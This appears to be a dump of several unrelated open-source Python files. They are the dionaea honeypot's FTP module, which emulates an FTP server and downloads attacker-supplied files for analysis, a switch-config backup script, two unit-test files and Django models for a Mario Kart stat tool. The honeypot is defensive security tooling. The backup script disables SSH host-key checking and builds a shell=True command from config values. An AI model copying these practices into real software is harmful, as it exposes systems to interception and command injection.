CMD_NOT_IMPLMNTD_FOR_PARAM: "504 Not implemented for parameter '%s'.",
NOT_LOGGED_IN: '530 Please login with USER and PASS.',
AUTH_FAILURE: '530 Sorry, Authentication failed.',
FILE_NOT_FOUND: '550 %s: No such file or directory.',
PERMISSION_DENIED: '550 %s: Permission denied.',
}
class ftpd(connection):
UNAUTH, INAUTH, AUTHED, RENAMING = range(4)
def __init__ (self, proto='tcp'):
connection.__init__(self, proto)
logger.debug("ftp test")
self.state = self.UNAUTH
self.user = 'bar'
self.dtp = None
self.cwd = '/'
self.basedir = '/tmp/ranz'
self.dtp = None
self.dtf = None
self.limits = {}#{ '_out' : 8192 }
def chroot(self, p):
self.basedir = p
def sendline(self, data):
self.send(data + '\r\n')
def reply(self, key, *args):
msg = RESPONSE[key] % args
self.sendline(msg)
def handle_origin(self, parent):
logger.debug("setting basedir to %s" % parent.basedir)
self.basedir = parent.basedir
def handle_established(self):
self.processors()
self.reply(WELCOME_MSG, "Welcome to the ftp service")
def handle_io_in(self, data):
# try:
# data = data.decode()
# except UnicodeDecodeError:
# logger.warn("error decoding")
# logger.debug("io_in" + data)
logger.debug(data)
lastsep = data.rfind(b"\n")
if lastsep == -1:
logger.debug("data without linebreak")
return 0
lastsep += 1 # add last \n
logger.debug("input size %i, can do %i" % (len(data), lastsep))
data = data[:lastsep]
lines = data.splitlines(0)
for line in lines:
logger.debug("processing line '%s'" % line)
if len(line) == 0:
continue
space = line.find(b' ')
if space != -1:
cmd = line[:space]
args = (line[space + 1:],)
else:
cmd = line
args = ()
logger.warn("cmd '%s'" % cmd)
r = self.processcmd(cmd, args)
if isinstance(r,tuple):
self.reply(*r)
elif r is not None:
self.reply(r)
return lastsep
def processcmd(self, cmd, args):
logger.debug("cmd '%s'" % cmd)
l = [i.decode() for i in args]
cmd = cmd.upper()
if self.state == self.UNAUTH:
if cmd != b'USER':
return NOT_LOGGED_IN
self.ftp_USER(*args)
elif self.state == self.INAUTH:
if cmd != b'PASS':
return (BAD_CMD_SEQ, "PASS required after USER")
self.ftp_PASS(*l)
method = getattr(self, "ftp_" + cmd.decode(), None)
if method is not None:
return method(*l)
else:
return (CMD_NOT_IMPLMNTD, cmd.decode())
def ftp_USER(self, username):
if not username:
return (SYNTAX_ERR, 'USER requires an argument')
self.state = self.INAUTH
self.user = username
if username == 'anonymous':
return GUEST_NAME_OK_NEED_EMAIL
else:
return (USR_NAME_OK_NEED_PASS, username)
def ftp_PASS(self, password):
if not password:
return (SYNTAX_ERR, 'PASS requires an argument')
self.state = self.AUTHED
if self.user == 'anonymous':
return GUEST_LOGGED_IN_PROCEED
else:
return USR_LOGGED_IN_PROCEED
def ftp_FEAT(self):
self.send('211-Features:\r\n' +
' PASV\r\n' +
' PORT\r\n' +
'211 End\r\n')
return None
def ftp_PORT(self, address):
if self.dtf:
self.dtf.close()
self.dtf = None
if self.dtp:
self.dtp.close()
self.dtp = None
addr = list(map(int, address.split(',')))
ip = '%d.%d.%d.%d' % tuple(addr[:4])
port = addr[4] << 8 | addr[5]
logger.debug("PORT cmd for port %i" % port)
if self.remote.host != ip and "::ffff:" + self.remote.host != ip:
logger.warn("Potential FTP Bounce Scan detected")
return None
self.dtp = ftpdataconnect(ip, port, self)
return None
def ftp_PASV(self):
if self.dtf:
self.dtf.close()
self.dtf = None
if self.dtp:
self.dtp.close()
self.dtp = None
self.dtf = ftpdatalisten(host=self.local.host, port=0, ctrl=self)
host = self.dtf.local.host
port = self.dtf.local.port
self.reply(ENTERING_PASV_MODE, encodeHostPort(host, port))
def ftp_QUIT(self):
self.reply(GOODBYE_MSG)
self.close()
def real_path(self, p=None):
if p:
name = os.path.join(self.cwd, p)
else:
name = self.cwd
if len(name) >= 1 and name[0] == '/':
name = name[1:]
name = os.path.join(self.basedir, name)
name = os.path.normpath(name)
return name
def ftp_RETR(self, p):
if not p:
return (SYNTAX_ERR_IN_ARGS, RETR)
name = self.real_path(p)
if not name.startswith(self.basedir):
return (PERMISSION_DENIED, p)
if os.path.exists(name) and os.path.isfile(name):
if self.dtp:
if self.dtp.status == 'established':
self.reply(FILE_STATUS_OK_OPEN_DATA_CNX)
self.dtp.send_file(name)
else:
logger.warn("dtp state %s %s:%i <-> %s:%i!" %
(self.dtp.status,
self.dtp.remote.host, self.dtp.remote.port,
self.dtp.local.host, self.dtp.local.port))
else:
logger.warn("no dtp on %s:%i <-> %s:%i!" %
(self.dtp.remote.host, self.dtp.remote.port,
self.dtp.local.host, self.dtp.local.port))
else:
return (FILE_NOT_FOUND, p)
def ftp_STOR(self, p):
if not p:
return (SYNTAX_ERR_IN_ARGS, STOR)
file = self.real_path(p)
if os.path.exists(file):
return (PERMISSION_DENIED, p)
if not file.startswith(self.basedir):
return (PERMISSION_DENIED, p)
if self.dtp:
if self.dtp.status == 'established':
self.reply(FILE_STATUS_OK_OPEN_DATA_CNX)
self.dtp.recv_file(file)
else:
logger.warn("dtp state %s %s:%i <-> %s:%i!" %
(self.dtp.status,
self.dtp.remote.host, self.dtp.remote.port,
self.dtp.local.host, self.dtp.local.port))
else:
logger.warn("no dtp on %s:%i <-> %s:%i!" %
(self.dtp.remote.host, self.dtp.remote.port,
self.dtp.local.host, self.dtp.local.port))
def ftp_TYPE(self, t):
if t == 'I':
return (TYPE_SET_OK, 'I')
else:
return (CMD_NOT_IMPLMNTD_FOR_PARAM, t)
def ftp_LIST(self, p=None):
name = self.real_path(p)
if not name.startswith(self.basedir):
return (FILE_NOT_FOUND, p)
if os.path.exists(name):
if self.dtp:
if self.dtp.status == 'established':
self.reply(FILE_STATUS_OK_OPEN_DATA_CNX)
self.dtp.send_list(name, len(name)+1)
else:
logger.warn("dtp state %s %s:%i <-> %s:%i!" %
(self.dtp.status,
self.dtp.remote.host, self.dtp.remote.port,
self.dtp.local.host, self.dtp.local.port))
else:
logger.warn("no dtp on %s:%i <-> %s:%i!" %
(self.dtp.remote.host, self.dtp.remote.port,
self.dtp.local.host, self.dtp.local.port))
else:
return (PERMISSION_DENIED, p)
def ftp_PWD(self):
return (PWD_REPLY, self.cwd)
def ftp_CWD(self, p):
cwd = self.real_path(p)
if not cwd.startswith(self.basedir):
return (FILE_NOT_FOUND, p)
else:
self.cwd = cwd[len(self.basedir):]
if self.cwd == "":
self.cwd = "/"
if os.path.exists(cwd) and os.path.isdir(cwd):
return REQ_FILE_ACTN_COMPLETED_OK
else:
return (PERMISSION_DENIED, p)
def ftp_PBSZ(self, arg):
return CMD_OK
def ftp_SYST(self):
return NAME_SYS_TYPE
def ftp_SIZE(self, p):
if not p:
return (FILE_NOT_FOUND,p)
file = self.real_path(p)
if not file.startswith(self.basedir):
return (FILE_NOT_FOUND, p)
if os.path.exists(file) and os.path.isfile(file):
return (FILE_STATUS, str(stat(file).st_size))
return (FILE_NOT_FOUND,p)
def ftp_MDTM(self, p):
if not p:
return (FILE_NOT_FOUND,p)
file = self.real_path(p)
if not file.startswith(self.basedir):
return (FILE_NOT_FOUND, p)
if os.path.exists(file) and os.path.isfile(file):
return (FILE_STATUS, time.strftime('%Y%m%d%H%M%S', time.gmtime(stat(file).st_mtime)))
return (FILE_NOT_FOUND,p)
def ftp_RMD(self, p):
if not p:
return (FILE_NOT_FOUND,p)
dir = self.real_path(p)
if not dir.startswith(self.basedir):
return (FILE_NOT_FOUND, p)
if os.path.exists(dir) and os.path.isdir(dir):
os.rmdir(dir)
return REQ_FILE_ACTN_COMPLETED_OK
return (FILE_NOT_FOUND,p)
def ftp_MKD(self, p):
if not p:
return (FILE_NOT_FOUND,p)
dir = self.real_path(p)
if not dir.startswith(self.basedir):
return (FILE_NOT_FOUND, p)
if os.path.isdir(dir):
return (PERMISSION_DENIED, p)
os.mkdir(dir)
return REQ_FILE_ACTN_COMPLETED_OK
def handle_error(self, err):
pass
def handle_disconnect(self):
if self.dtf:
self.dtf.close()
self.dtf = None
if self.dtp:
self.dtp.close()
self.dtp = None
return 0
def encodeHostPort(host, port):
numbers = host.split('.') + [str(port >> 8), str(port % 256)]
return ','.join(numbers)
from os import stat
from stat import *
import time
import io
class ftpdatacon(connection):
def __init__ (self, ctrl=None):
connection.__init__(self,'tcp')
self.ctrl = ctrl
self.mode = None
def handle_error (self, err):
if self.ctrl:
self.ctrl.reply(CANT_OPEN_DATA_CNX)
def send_list(self, p, rm):
def ls(f, r):
logger.debug("stat %s" % f)
name = f[r:]
s=stat(f)
size = s.st_size
directory = S_ISDIR(s.st_mode)
permissions = S_IMODE(s[ST_MODE])
hardlinks = s.st_nlink
modified = s.st_mtime
owner = s.st_uid
group = s.st_gid
def formatMode(mode):
return ''.join([mode & (256 >> n) and 'rwx'[n % 3] or '-' for n in range(9)])
def formatDate(mtime):
now = time.gmtime()
info = {
'month': mtime.tm_mon,
'day': mtime.tm_mday,
'year': mtime.tm_year,
'hour': mtime.tm_hour,
'minute': mtime.tm_min
}
if now.tm_year != mtime.tm_year:
return '%(month)s %(day)02d %(year)5d' % info
else:
return '%(month)s %(day)02d %(hour)02d:%(minute)02d' % info
format = ('%(directory)s%(permissions)s%(hardlinks)4d '
'%(owner)-9s %(group)-9s %(size)15d %(date)12s '
'%(name)s')
return format % {
'directory': directory and 'd' or '-',
'permissions': formatMode(permissions),
'hardlinks': hardlinks,
'owner': owner,
'group': group,
'size': size,
'date': formatDate(time.gmtime(modified)),
'name': name}
self.mode = 'list'
if os.path.isdir(p):
self.data = [ls(os.path.join(p,f), rm) for f in os.listdir(p)]
elif os.path.isfile(p):
self.data = [ls(p)]
logger.debug("p %s len %i" % (p, len(self.data)) )
if len(self.data) > 0:
self.off = 0
self.off = self.off + 1
self.send(self.data[self.off-1] + '\r\n')
else:
self.close()
if self.ctrl:
self.ctrl.dtp = None
self.ctrl.reply(TXFR_COMPLETE_OK)
def recv_file(self, p):
logger.debug(p)
self.mode = 'recv_file'
self.file = io.open(p, 'wb+')
print(self.file)
def send_file(self, p):
self.mode = 'file'
self.file = io.open(p, 'rb')
w = self.file.read(1024)
self.send(w)
if len(w) < 1024:
self.file.close()
self.mode = None
self.close()
if self.ctrl:
self.ctrl.reply(TXFR_COMPLETE_OK)
self.ctrl.dtp = None
def handle_io_in(self, data):
if self.mode == "recv_file":
self.file.write(data)
return len(data)
def handle_io_out(self):
logger.debug("io_out")
if self.mode == 'list':
if self.off < len(self.data):
self.off = self.off + 1
self.send(self.data[self.off - 1] + '\r\n')
else:
self.close()
if self.ctrl:
self.ctrl.dtp = None
self.ctrl.reply(TXFR_COMPLETE_OK)
elif self.mode == 'file':
w = self.file.read(1024)
self.send(w)
if len(w) < 1024:
self.mode = None
self.close()
self.file.close()
if self.ctrl:
self.ctrl.dtp = None
self.ctrl.reply(TXFR_COMPLETE_OK)
def handle_disconnect(self):
if self.ctrl:
if self.ctrl.dtf:
self.ctrl.dtf = None
if self.ctrl.dtp:
self.ctrl.dtp = None
if self.mode == 'file' and self.file:
self.file.close()
if self.mode == 'recv_file' and self.file:
self.file.close()
self.ctrl.reply(TXFR_COMPLETE_OK)
return 0
def handle_origin(self, parent):
pass
# if parent.limits._out:
# self._out.limit = parent.limits._out
class ftpdataconnect(ftpdatacon):
def __init__ (self, host, port, ctrl):
ftpdatacon.__init__(self,ctrl)
self.connect(host,port)
def handle_established(self):
logger.debug("DATA connection established")
self.ctrl.reply(ENTERING_PORT_MODE)
class ftpdatalisten(ftpdatacon):
def __init__ (self, host=None, port=None, ctrl=None):
ftpdatacon.__init__(self,ctrl)
if host is not None:
self.bind(host,port)
self.listen(1)
if ctrl.limits:
self._out.throttle = ctrl.limits['_out']
def handle_established(self):
logger.debug("DATA connection established")
def handle_origin(self, parent):
ftpdatacon.handle_origin(self,parent)
logger.debug("Meeting parent")
self.ctrl = parent.ctrl
self.ctrl.dtp = self
self.ctrl.dtf = None
parent.ctrl = None
parent.close()
# ftp client
import re
import random
_linesep_regexp = re.compile(b"\r?\n")
class ftpctrl(connection):
def __init__(self, ftp):
connection.__init__(self, 'tcp')
self.ftp = ftp
self.state = 'NONE'
self.timeouts.sustain = 60
def handle_established(self):
logger.debug("FTP CTRL connection established")
def handle_io_in(self, data):
dlen = len(data)
lines = _linesep_regexp.split(data)#.decode('UTF-8'))
remain = lines.pop()
dlen = dlen - len(remain)
for line in lines:
logger.debug("FTP LINE: " + str(line))
c = int(line[:3])
s = line[3:4]
if self.state == 'NONE':
if c == 220 and s != b'-':
self.cmd('USER ' + self.ftp.user)
self.state = 'USER'
elif self.state == 'USER' or self.state == 'PASS':
if self.state == 'USER' and c == 331 and s != b'-':
self.cmd('PASS ' + self.ftp.passwd)
self.state = 'PASS'
if c == 230 and s != b'-':
if self.ftp.mode == 'binary':
self.cmd('TYPE I')
self.state = 'TYPE'
else:
port = self.ftp.makeport()
self.cmd('PORT ' + port)
self.state = 'PORT'
elif self.state == 'TYPE':
if (c >= 200 and c < 300) and s != b'-':
port = self.ftp.makeport()
self.cmd('PORT ' + port)
self.state = 'PORT'
elif self.state == 'PORT':
if c == 200 and s != b'-':
self.cmd('RETR ' + self.ftp.file)
self.state = 'RETR'
else:
logger.warn("PORT command failed")
elif self.state == 'RETR':
if (c > 200 and c < 300) and s != b'-':
self.cmd('QUIT')
self.state = 'QUIT'
self.ftp.ctrldone()
return dlen
def cmd(self, cmd):
logger.debug("FTP CMD: '" + cmd +"'")
self.send(cmd + '\r\n')
def handle_error(self, err):
self.ftp.fail()
return False
def handle_disconnect(self):
if self.state != 'QUIT':
self.ftp.fail()
return False
def handle_timeout_idle(self):
return False
def handle_timeout_sustain(self):
return False
class ftpdata(connection):
def __init__(self, ftp=None):
connection.__init__(self, 'tcp')
self.ftp = ftp
self.timeouts.listen = 10
def handle_established(self):
logger.debug("FTP DATA established")
self.timeouts.idle = 30
self.fileobj = tempfile.NamedTemporaryFile(delete=False, prefix='ftp-', suffix=g_dionaea.config(
)['downloads']['tmp-suffix'], dir=g_dionaea.config()['downloads']['dir'])
def handle_origin(self, parent):
self.ftp = parent.ftp
self.ftp.dataconn = self
self.ftp.datalistener.close()
self.ftp.datalistener = None
def handle_io_in(self, data):
self.fileobj.write(data)
return len(data)
def handle_timeout_idle(self):
self.fileobj.unlink(self.fileobj.name)
self.fileobj = None
self.ftp.fail()
return False
def handle_disconnect(self):
logger.debug("received %i bytes" %(self._in.accounting.bytes))
if hasattr(self, 'fileobj')and self.fileobj != None:
# print(type(self.file))
# print(self.file)
self.fileobj.close()
icd = incident("dionaea.download.complete")
icd.path = self.fileobj.name
icd.con = self.ftp.con
icd.url = self.ftp.url
icd.report()
self.fileobj.unlink(self.fileobj.name)
self.ftp.dataconn = None
self.ftp.datadone()
return False
def handle_timeout_listen(self):
self.ftp.fail()
return False
class ftp:
def __init__(self):
self.ctrl = ftpctrl(self)
def download(self, con, user, passwd, host, port, file, mode, url):
self.user = user
self.passwd = passwd
self.host = host
self.port = port
self.file = file
self.mode = mode
self.con = con
self.url = url
if con:
self.local = con.local.host
self.ctrl.bind(self.local, 0)
self.con.ref()
self.ctrl.connect(host, port)
self.dataconn = None
self.datalistener = None
if con:
i=incident("dionaea.connection.link")
i.parent = con
i.child = self.ctrl
i.report()
def makeport(self):
self.datalistener = ftpdata(ftp=self)
try:
portrange = g_dionaea.config()['modules']['python'][
'ftp']['active-ports']
(minport, maxport) = portrange.split('-')
minport = int(minport)
maxport = int(maxport)
except:
minport = 62001
maxport = 63000
try:
# for NAT setups
host = g_dionaea.config()['modules']['python'][
'ftp']['active-host']
if host == '0.0.0.0':
host = self.ctrl.local.host
logger.info("datalisten host %s" % host)
else:
import socket
host = socket.gethostbyname(host)
logger.info("resolved host %s" % host)
except:
host = self.ctrl.local.host
logger.info("except datalisten host %s" % self.ctrl.local.host)
# NAT, use a port range which is forwarded to your honeypot
ports = list(
filter(lambda port: ((port >> 4) & 0xf) != 0, range(minport, maxport)))
random.shuffle(ports)
port = None
for port in ports:
self.datalistener.bind(self.ctrl.local.host, port)
if self.datalistener.listen() == True:
port = self.datalistener.local.port
i=incident("dionaea.connection.link")
i.parent = self.ctrl
i.child = self.datalistener
i.report()
break
hbytes = host.split('.')
pbytes = [repr(port//256), repr(port%256)]
bytes = hbytes + pbytes
port = ','.join(bytes)
logger.debug("PORT CMD %s" % (port))
return port
def ctrldone(self):
logger.info("SUCCESS DOWNLOADING FILE")
self.done()
def datadone(self):
logger.info("FILE received")
self.done()
def done(self):
if self.ctrl and self.ctrl.state == 'QUIT' and self.dataconn == None:
logger.info("proceed processing file!")
self.ctrl = None
self.finish()
def fail(self):
self.finish()
def finish(self):
if self.con:
self.con.unref()
self.con = None
if self.ctrl != None:
self.ctrl.close()
self.ctrl = None
if self.datalistener and self.datalistener != None:
self.datalistener.close()
self.datalistener = None
if self.dataconn and self.dataconn != None:
self.dataconn.close()
self.dataconn = None
class ftpdownloadhandler(ihandler):
def __init__(self, path):
logger.debug("%s ready!" % (self.__class__.__name__))
ihandler.__init__(self, path)
def handle_incident(self, icd):
url = icd.url
p = urllib.parse.urlsplit(url)
print(p)
if p.scheme == 'ftp':
logger.info("do download")
try:
con = icd.con
except AttributeError:
con = None
if hasattr(icd,'ftpmode'):
ftpmode = icd.ftpmode
else:
ftpmode = 'binary'
f = ftp()
f.download(
con, p.username, p.password, p.hostname, p.port, p.path, ftpmode, url)
| GovCERT-CZ/dionaea | modules/python/scripts/ftp.py | Python | gpl-2.0 | 32,082 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:set sw=4 ts=4 et:
import sys
import pexpect
import threading
import os
import shutil
import logging
import time
import configparser
import ast
import subprocess
def backup(switch, server):
if switch['type'].lower() == '3com':
return backup_3com(switch, server)
elif switch['type'].lower() == 'hp':
return backup_hp(switch, server)
else:
logging.error("Unsupported type of switch (type: %s)" % (switch['type']))
return 4
def backup_3com(switch, server):
try:
ssh=pexpect.spawn('ssh -o StrictHostKeyChecking=no %s@%s' % (switch['username'], switch['ip']))
logging.debug('%s: connecting to ip: %s' % (switch['name'], switch['ip']))
ssh.expect('password')
except:
logging.error("Connection failed(%s)\n \t%s" % (switch['name'], ssh.before))
return 1
try:
ssh.sendline('%s' % switch['password'])
logging.debug('%s: authenticating username: %s' % (switch['name'], switch['username']))
ssh.expect('login')
except:
logging.error("Authorization failed(%s)\n \tusername: %s" % (switch['name'], switch['username']))
return 2
try:
ssh.sendline("backup fabric current-configuration to %s %s.cfg" % (server, switch['name']))
logging.debug('%s: backuping to server: %s' % (switch['name'], server))
ssh.expect('finished!\s+<.*>',timeout=30)
ssh.sendline('quit')
except:
logging.error("Backup failed(%s)\n \t%s" % (switch['name'], ssh.before))
return 3
logging.info("Configuration from %s uploaded to tftp server %s" % (switch['name'], server))
return 0
def backup_hp(switch, server):
try:
ssh=pexpect.spawn('ssh -o StrictHostKeyChecking=no %s@%s' % (switch['username'], switch['ip']))
logging.debug('%s: connecting to ip: %s' % (switch['name'], switch['ip']))
ssh.expect('password')
except:
logging.error("Connection failed(%s)\n \t%s" % (switch['name'], ssh.before))
return 1
try:
ssh.sendline('%s' % switch['password'])
logging.debug('%s: authenticating username: %s' % (switch['name'], switch['username']))
ssh.expect('>')
except:
logging.error("Authorization failed(%s)\n \tusername: %s" % (switch['name'], switch['username']))
return 2
try:
ssh.sendline("backup startup-configuration to %s %s.cfg" % (server, switch['name']))
logging.debug('%s: backuping to server: %s' % (switch['name'], server))
ssh.expect('finished!\s+<.*>',timeout=30)
ssh.sendline('quit')
except:
logging.error("Backup failed(%s)\n \t%s" % (switch['name'], ssh.before))
return 3
logging.info("Configuration from %s uploaded to tftp server %s" % (switch['name'], server))
return 0
def sws_cfg_check(sws_cfg):
keys = {'username', 'password', 'name', 'ip', 'units', 'type'}
for section in sws_cfg:
for key in keys:
if not key in sws_cfg[section]:
raise Exception("Key \'%s\' in switches configuration in section \'%s\' is missing" % (key, section))
def load_switches_cfg():
sws_cfg = configparser.ConfigParser()
sws_cfg.read("%s/conf/switches.cfg" % (sys.path[0]))
retval = dict()
for section in sws_cfg.sections():
retval[section] = dict(sws_cfg.items(section))
sws_cfg_check(retval)
return retval
def app_cfg_check(app_cfg):
keys = {'backup_dir_path', 'backup_server', 'file_expiration_timeout', 'tftp_dir_path', 'log_file', 'git_autocommit'}
for key in keys:
if not key in app_cfg:
raise Exception("Key \'%s\' in application configuration file is missing" % (key))
def load_app_cfg():
app_cfg = configparser.ConfigParser()
app_cfg.read("%s/conf/app.cfg" % (sys.path[0]))
retval = dict(app_cfg.items('APP'))
app_cfg_check(retval)
retval['git_autocommit'] = retval['git_autocommit'].lower() in ['true', '1', 'yes', 'y']
return retval
def git_autocommit(app_cfg):
command = "cd %s; git add -A; git commit -a -m 'autocommit on change'" % (app_cfg['backup_dir_path'])
subprocess.Popen(command,stdout=subprocess.PIPE, shell=True)
def main():
app_cfg = load_app_cfg()
logging.basicConfig(filename=app_cfg['log_file'], level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s')
switches_cfg = load_switches_cfg()
threads = []
for switch in switches_cfg:
t = threading.Thread(target = backup, args = (switches_cfg[switch], app_cfg['backup_server']))
t.start()
threads.append(t)
for t in threads:
t.join()
end_time = time.time()
file_expiration_timeout = int(app_cfg['file_expiration_timeout'])
for section in switches_cfg:
switch = switches_cfg[section]
if switch['type'].lower() == '3com':
units = ast.literal_eval(switch['units'])
for unit in units:
tmp_file_path = "%s/%s_%d.cfg" % (app_cfg['tftp_dir_path'],switch['name'],unit)
if not os.access(tmp_file_path, os.R_OK):
logging.warning("Fail to read %s unit %d, expected file %s" % (switch['name'],unit,tmp_file_path))
elif (end_time - os.stat(tmp_file_path).st_mtime) > file_expiration_timeout:
logging.error("Configuration of %s unit %d, file %s is older than %d s, file will be ignored" % (switch['name'],unit,tmp_file_path, file_expiration_timeout))
else:
shutil.copy2(tmp_file_path, app_cfg['backup_dir_path'])
logging.info("Saved %s unit %d configuration" % (switch['name'],unit))
elif switch['type'].lower() == 'hp':
tmp_file_path = "%s/%s.cfg" % (app_cfg['tftp_dir_path'],switch['name'])
if not os.access(tmp_file_path, os.R_OK):
logging.warning("Fail to read %s, expected file %s" % (switch['name'],tmp_file_path))
elif (end_time - os.stat(tmp_file_path).st_mtime) > file_expiration_timeout:
logging.error("Configuration of %s, file %s is older than %d s, file will be ignored" % (switch['name'],tmp_file_path, file_expiration_timeout))
else:
shutil.copy2(tmp_file_path, app_cfg['backup_dir_path'])
logging.info("Saved %s configuration" % (switch['name']))
if app_cfg['git_autocommit'] is True:
git_autocommit(app_cfg)
return 0
if __name__ == '__main__':
main()
| brabemi/sw_config_backup | sw_config_backup.py | Python | gpl-2.0 | 5,888 |
from chimera.core.chimeraobject import ChimeraObject
from chimera.core.manager import Manager
from chimera.core.exceptions import ChimeraException
from nose.tools import assert_raises
import chimera.core.log
import logging
log = logging.getLogger("chimera.test_log")
class TestLog (object):
def test_log (self):
class Simple (ChimeraObject):
def __init__ (self):
ChimeraObject.__init__(self)
def answer (self):
try:
raise ChimeraException("I'm an Exception, sorry.")
except ChimeraException:
self.log.exception("from except: wow, exception caught.")
raise ChimeraException("I'm a new Exception, sorry again")
manager = Manager()
manager.addClass(Simple, "simple")
simple = manager.getProxy(Simple)
try:
simple.answer()
except ChimeraException, e:
assert e.cause != None
log.exception("wow, something wrong")
manager.shutdown()
| wschoenell/chimera_imported_googlecode | src/chimera/core/tests/test_log.py | Python | gpl-2.0 | 1,086 |
from .__meta__ import *
from tracer.resources.processes import Processes, Process
from tracer.resources.collections import ProcessesCollection
import os
import subprocess
@unittest.skipIf(True, "@TODO Create Mock for Processes class")
class TestProcesses(unittest.TestCase):
def test_children(self):
process = Processes.all()[0]
children = process.children()
self.assertIsInstance(children, ProcessesCollection)
for child in children:
self.assertIsInstance(child, Process)
def test_unique_process(self):
process = Process(os.getpid())
parent = Process(os.getppid())
self.assertIs(process, Process(os.getpid()))
self.assertIs(parent, process.parent())
self.assertIn(process, parent.children())
Process.reset_cache()
process2 = Process(os.getpid())
self.assertEqual(process, process2)
self.assertIsNot(process, process2)
def test_process_caching(self):
process = Process(os.getpid())
# Populate the cache entry for children
process.children()
child = subprocess.Popen(os.sys.executable, stdin=subprocess.PIPE)
self.assertEqual(0, len(process.children()))
process.rebuild_cache()
self.assertEqual(1, len(process.children()))
child.terminate()
| sean797/tracer | tests/test_processes.py | Python | gpl-2.0 | 1,199 |
"""Django models for MK8 Kart Comparison Tool."""
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.templatetags.static import static
import re
import uuid
import logging
from ipware.ip import get_ip, get_real_ip
logger = logging.getLogger(__name__)
class KartComponent(models.Model):
"""Abstract model for all kart components."""
name = models.CharField(max_length=30, blank=True)
def __unicode__(self):
"""Return the component name."""
return self.name
def file(self):
"""Return a lowercase form of the name used for image filenames."""
return re.sub(ur'[\W_]+', u'', self.name.lower(), flags=re.UNICODE)
class Meta:
abstract = True
ordering = ['pk']
class CommonStats(KartComponent):
"""Common stats across all kart components."""
speed_ground = models.DecimalField(max_digits=3, decimal_places=2)
speed_water = models.DecimalField(max_digits=3, decimal_places=2)
speed_air = models.DecimalField(max_digits=3, decimal_places=2)
speed_antigravity = models.DecimalField(max_digits=3, decimal_places=2)
acceleration = models.DecimalField(max_digits=3, decimal_places=2)
weight = models.DecimalField(max_digits=3, decimal_places=2)
handling_ground = models.DecimalField(max_digits=3, decimal_places=2)
handling_water = models.DecimalField(max_digits=3, decimal_places=2)
handling_air = models.DecimalField(max_digits=3, decimal_places=2)
handling_antigravity = models.DecimalField(max_digits=3, decimal_places=2)
traction = models.DecimalField(max_digits=3, decimal_places=2)
miniturbo = models.DecimalField(max_digits=3, decimal_places=2)
class Meta:
abstract = True
class CharacterStats(CommonStats):
"""Maps racers to the stats belonging to the 9 weight subclasses."""
sort_order = models.CharField(max_length=5)
class Kart(CommonStats):
"""Stats for a kart body."""
def file(self):
"""Return a lowercase form of the name used for image filenames."""
return static('images/mk8/karts/%s.png' % super(Kart, self).file())
class Meta:
verbose_name_plural = "karts"
ordering = ['pk']
class Wheel(CommonStats):
"""Stats for a set of kart wheels."""
def file(self):
"""Return a lowercase form of the name used for image filenames."""
return static('images/mk8/wheels/%s.png' % super(Wheel, self).file())
class Meta:
ordering = ['pk']
class Glider(CommonStats):
"""Stats for a kart glider."""
def file(self):
"""Return a lowercase form of the name used for image filenames."""
return static('images/mk8/gliders/%s.png' % super(Glider, self).file())
class Meta:
ordering = ['pk']
class Character(KartComponent):
"""Stats for a kart racer/driver."""
stats = models.ForeignKey(CharacterStats)
def file(self):
"""Return a lowercase form of the name used for image filenames."""
return static('images/mk8/faces/%s.png' % super(Character, self).file())
class Meta:
ordering = ['pk']
class KartConfig():
"""Stats for a complete kart configuration."""
def __init__(self, (character_id, kart_id, wheel_id, glider_id)):
"""Create a config with the supplied component ids."""
try:
self.character = Character.objects.get(pk=character_id)
self.kart = Kart.objects.get(pk=kart_id)
self.wheel = Wheel.objects.get(pk=wheel_id)
self.glider = Glider.objects.get(pk=glider_id)
self.valid = True
self.speed_ground = \
self.character.stats.speed_ground + \
self.kart.speed_ground + \
self.wheel.speed_ground + \
self.glider.speed_ground
self.speed_water = \
self.character.stats.speed_water + \
self.kart.speed_water + \
self.wheel.speed_water + \
self.glider.speed_water
self.speed_air = \
self.character.stats.speed_air + \
self.kart.speed_air + \
self.wheel.speed_air + \
self.glider.speed_air
self.speed_antigravity = \
self.character.stats.speed_antigravity + \
self.kart.speed_antigravity + \
self.wheel.speed_antigravity + \
self.glider.speed_antigravity
self.acceleration = \
self.character.stats.acceleration + \
self.kart.acceleration + \
self.wheel.acceleration + \
self.glider.acceleration
self.weight = \
self.character.stats.weight + \
self.kart.weight + \
self.wheel.weight + \
self.glider.weight
self.handling_ground = \
self.character.stats.handling_ground + \
self.kart.handling_ground + \
self.wheel.handling_ground + \
self.glider.handling_ground
self.handling_water = \
self.character.stats.handling_water + \
self.kart.handling_water + \
self.wheel.handling_water + \
self.glider.handling_water
self.handling_air = \
self.character.stats.handling_air + \
self.kart.handling_air + \
self.wheel.handling_air + \
self.glider.handling_air
self.handling_antigravity = \
self.character.stats.handling_antigravity + \
self.kart.handling_antigravity + \
self.wheel.handling_antigravity + \
self.glider.handling_antigravity
self.traction = \
self.character.stats.traction + \
self.kart.traction + \
self.wheel.traction + \
self.glider.traction
self.miniturbo = \
self.character.stats.miniturbo + \
self.kart.miniturbo + \
self.wheel.miniturbo + \
self.glider.miniturbo
except ObjectDoesNotExist:
self.valid = False
class ConfigList(models.Model):
"""A saved kart configuration list associated with a url hash."""
URL_LENGTH = 5
url = models.CharField(max_length=URL_LENGTH)
create_ip = models.GenericIPAddressField(default='0.0.0.0')
create_date = models.DateTimeField(auto_now_add=True)
view_count = models.PositiveIntegerField(default=0)
@classmethod
def create(cls, request):
"""Initialize a ConfigList with visitor's IP and generated url hash."""
ip = get_real_ip(request)
if ip is None:
ip = get_ip(request)
if ip is None:
ip = '111.111.111.111'
url = cls.generate_url(cls.URL_LENGTH)
list = cls(url=url, create_ip=ip)
logger.info('Adding ConfigList \'%s\' (%s)' % (url, ip))
return list
@staticmethod
def generate_url(length):
"""Generate a unique url hash."""
while True:
url_hash = uuid.uuid4().hex[0:length]
try:
ConfigList.objects.get(url=url_hash)
break
except ObjectDoesNotExist:
return url_hash
def __unicode__(self):
"""Display url hash to id mapping."""
return '[\'%s\' -> %s]' % (self.url, self.id)
class ConfigListItem(models.Model):
"""A saved kart configuration associated with a ConfigList."""
list = models.ForeignKey(ConfigList)
character = models.ForeignKey(Character)
kart = models.ForeignKey(Kart)
wheel = models.ForeignKey(Wheel)
glider = models.ForeignKey(Glider)
@classmethod
def create(cls, list, character, kart, wheel, glider):
"""Initialize ConfigListItem with default parameters order."""
